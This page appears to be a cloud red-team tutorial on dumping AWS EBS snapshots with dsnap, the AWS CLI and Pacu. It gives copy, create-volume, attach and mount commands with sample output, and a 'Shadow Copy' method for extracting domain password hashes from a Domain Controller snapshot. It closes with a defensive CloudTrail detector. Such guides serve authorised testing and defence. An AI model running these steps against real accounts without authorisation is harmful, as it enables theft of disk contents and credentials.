AWS - EBS Snapshot Dump

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Checking the snapshot locally

# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox

# Get snapshot from image
mkdir snap_workdir; cd snap_workdir
dsnap init
## Download a snapshot of the volume of that instance
## If no snapshot existed it will try to create one
dsnap get <instance-id>
dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
## Other way to get a snapshot
dsnap list #List snapshots
dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly

# Run with vagrant
IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtualbox
IMAGE="<download_file>.img" vagrant ssh #Access the VM
vagrant destroy #To destroy

# Run with docker
git clone https://github.com/RhinoSecurityLabs/dsnap.git
cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded

Note that dsnap will not let you download public snapshots. To work around this, you can copy the snapshot into your own account and download that copy:

# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"

# View the snapshot info
aws ec2 describe-snapshots --owner-ids self --region us-east-2

# Download the snapshot. The ID is the copy from your account
dsnap --region us-east-2 get snap-027da41be451109da

# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2

For more information about this technique see the original research at https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/

You can do this with Pacu using the module ebs__download_snapshots

Checking the snapshot in AWS

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

Mount it on an EC2 VM under your control (it must be in the same region as the snapshot copy):

Step 1: A new volume of the size and type you prefer should be created by navigating to EC2 -> Volumes.

To carry out this step, follow these commands:

  • Create an EBS volume to attach to the EC2 instance.

  • Make sure the EBS volume and the instance are in the same availability zone.

Step 2: The "attach volume" option should be selected by right-clicking on the created volume.

Step 3: The instance should be selected from the instance text box.

To carry out this step, use the following command:

  • Attach the EBS volume.

Step 4: Log in to the EC2 instance and list the available disks using the lsblk command.

Step 5: Check whether the volume contains any data using the command sudo file -s /dev/xvdf.

If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.

Step 6: Format the volume as ext4 using the command sudo mkfs -t ext4 /dev/xvdf. Alternatively, you can use the xfs format with the command sudo mkfs -t xfs /dev/xvdf. Note that you should use either ext4 or xfs.

Step 7: Create a directory of your choice on which to mount the new ext4 volume. For example, you can use the name "newvolume".

To carry out this step, use the command sudo mkdir /newvolume.

Step 8: Mount the volume on the "newvolume" directory using the command sudo mount /dev/xvdf /newvolume/.

Step 9: Change into the "newvolume" directory and check the disk space to confirm that the volume is mounted.

To carry out this step, use the following commands:

  • Change directory to /newvolume.

  • Check the disk space using the command df -h . (the output of this command should show the free space in the "newvolume" directory).

You can do this with Pacu using the module ebs__explore_snapshots.

Checking the snapshot in AWS (using the CLI)

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>

# Attach new volume to instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>

# mount the snapshot from within the VM

sudo file -s /dev/sdh
/dev/sdh: symbolic link to `xvdh'

sudo file -s /dev/xvdh
/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63

lsblk /dev/xvdh
NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
xvdh     202:112  0    8G  0 disk
├─xvdh1  202:113  0  7.9G  0 part
├─xvdh14 202:126  0    4M  0 part
└─xvdh15 202:127  0  106M  0 part

sudo mount /dev/xvdh1 /mnt

ls /mnt

Shadow Copy

Any AWS user with the EC2:CreateSnapshot permission can steal the hashes of all domain users by creating a snapshot of the Domain Controller, mounting it on an instance they control, and extracting the NTDS.dit file and the SYSTEM registry hive for use with Impacket's secretsdump project.

You can use this tool to carry out the attack: https://github.com/Static-Flow/CloudCopy, or you can use one of the previous techniques after creating the snapshot.
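As an added, defender-side example (not part of the original page, and not code from dsnap, Pacu or CloudCopy): a small Python correlator that flags, in CloudTrail records, the CreateSnapshot/CopySnapshot -> CreateVolume -> AttachVolume chain that both the manual mounting steps above and the Shadow Copy attack leave behind. The records and every ID in them are constructed; the field names follow CloudTrail's layout, but the events are simplified.

```python
# Constructed CloudTrail-style records (simplified field layout, not real data).
EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventName": "CreateSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"volumeId": "vol-0dc00000000000001"},
     "responseElements": {"snapshotId": "snap-0aaaaaaaaaaaaaaa1"}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventName": "CreateVolume",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"snapshotId": "snap-0aaaaaaaaaaaaaaa1"},
     "responseElements": {"volumeId": "vol-0bbbbbbbbbbbbbbb1"}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventName": "AttachVolume",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"volumeId": "vol-0bbbbbbbbbbbbbbb1",
                           "instanceId": "i-0eeeeeeeeeeeeeee1", "device": "/dev/sdh"}},
    # Benign: a volume restored from a snapshot but never attached anywhere.
    {"eventTime": "2024-05-01T11:00:00Z", "eventName": "CreateVolume",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:role/backup"},
     "requestParameters": {"snapshotId": "snap-0cccccccccccccccc1"},
     "responseElements": {"volumeId": "vol-0ddddddddddddddd1"}},
]

def find_snapshot_dump_chains(events):
    """Return one finding per volume that was built from a snapshot and then
    attached to an instance (the CreateSnapshot/CopySnapshot -> CreateVolume
    -> AttachVolume chain this page walks through), in event-time order."""
    snap_source = {}    # snapshotId -> volume it was taken from, or "copy"
    vol_from_snap = {}  # volumeId -> snapshotId it was restored from
    findings = []
    for e in sorted(events, key=lambda ev: ev["eventTime"]):
        name = e["eventName"]
        req = e.get("requestParameters") or {}
        resp = e.get("responseElements") or {}
        if name in ("CreateSnapshot", "CopySnapshot"):
            snap_source[resp.get("snapshotId")] = req.get("volumeId", "copy")
        elif name == "CreateVolume" and req.get("snapshotId"):
            vol_from_snap[resp["volumeId"]] = req["snapshotId"]
        elif name == "AttachVolume" and req.get("volumeId") in vol_from_snap:
            snap = vol_from_snap[req["volumeId"]]
            findings.append({
                "principal": e["userIdentity"]["arn"],
                "snapshotId": snap,
                # "unknown": the snapshot was created outside this log window
                "sourceVolume": snap_source.get(snap, "unknown"),
                "volumeId": req["volumeId"],
                "instanceId": req.get("instanceId"),
            })
    return findings
```

A volume restored from a snapshot of one instance and attached to a different instance is the signal worth alerting on; the "sourceVolume" field lets a rule compare the two.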
